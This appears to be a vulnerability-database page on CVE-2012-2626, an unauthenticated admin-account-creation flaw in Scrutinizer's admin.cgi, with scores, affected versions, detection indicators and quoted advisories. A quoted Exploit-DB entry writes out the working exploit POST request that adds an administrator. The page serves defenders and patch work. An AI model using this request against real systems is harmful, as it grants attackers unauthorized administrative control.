CVE-2012-2626
published 2012-07-31CVE-2012-2626: cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows…
PriorityP276medium5CVSS 2.0
AVNACLAuNCNIPAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
44.46%
98.6th percentile
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonicwall | scrutinizer | < 9.5.0 | 9.5.0 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for unauthenticated POST requests to /cgi-bin/admin.cgi containing the 'tool=userprefs' parameter, which indicates an attempt to add an administrative account without token authentication. ↗
- →Alert on HTTP POST request bodies to /cgi-bin/admin.cgi containing both 'tool=userprefs' and 'selectedUserGroup=' parameters, as this is the exact exploit payload pattern for adding a privileged account. ↗
- →A successful exploit returns a JSON response body of the form {"new_user_id":"<N>"} with HTTP 200 from /cgi-bin/admin.cgi; correlate this response with the POST payload to confirm exploitation. ↗
- →The Metasploit auxiliary module targets this vulnerability; look for automated/scripted POST requests to /cgi-bin/admin.cgi without a valid session token from unexpected source IPs. ↗
- ·The vulnerability exists in Scrutinizer versions before 9.5.0; the endpoint /cgi-bin/admin.cgi does not enforce token authentication in affected versions, meaning any unauthenticated remote request can create admin accounts. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
vulncheck5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2m69-x28v-rwx9: cgi-bin/admin
ghsa_unreviewed·2022-05-14
CVE-2012-2626 [MEDIUM] CWE-287 GHSA-2m69-x28v-rwx9: cgi-bin/admin
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
VulnCheck
SonicWall scrutinizer Improper Authentication
vulncheck·2012·CVSS 5.0
CVE-2012-2626 [MEDIUM] SonicWall scrutinizer Improper Authentication
SonicWall scrutinizer Improper Authentication
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
Affected: SonicWall scrutinizer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2012-2626
SonicWall
CVE-2012-2626: cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which
vendor_sonicwall·2012-07-31·CVSS 5.0
CVE-2012-2626 [MEDIUM] CWE-287 CVE-2012-2626: cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which
CVE-2012-2626: cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
No detection rules found.
Exploit-DB
Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass
exploitdb·2012-07-30
CVE-2012-2626 Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass
Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass
---
source: https://www.securityfocus.com/bid/54727/info
Scrutinizer is prone to an authentication-bypass vulnerability.
Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: 10.70.70.212
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Ap
Metasploit
Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass
metasploit
Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass
Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass
This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer without any authentication. Versions such as 9.0.1 or older are affected.
No writeups or analysis indexed.
2012-07-31
Published
Exploited in the wild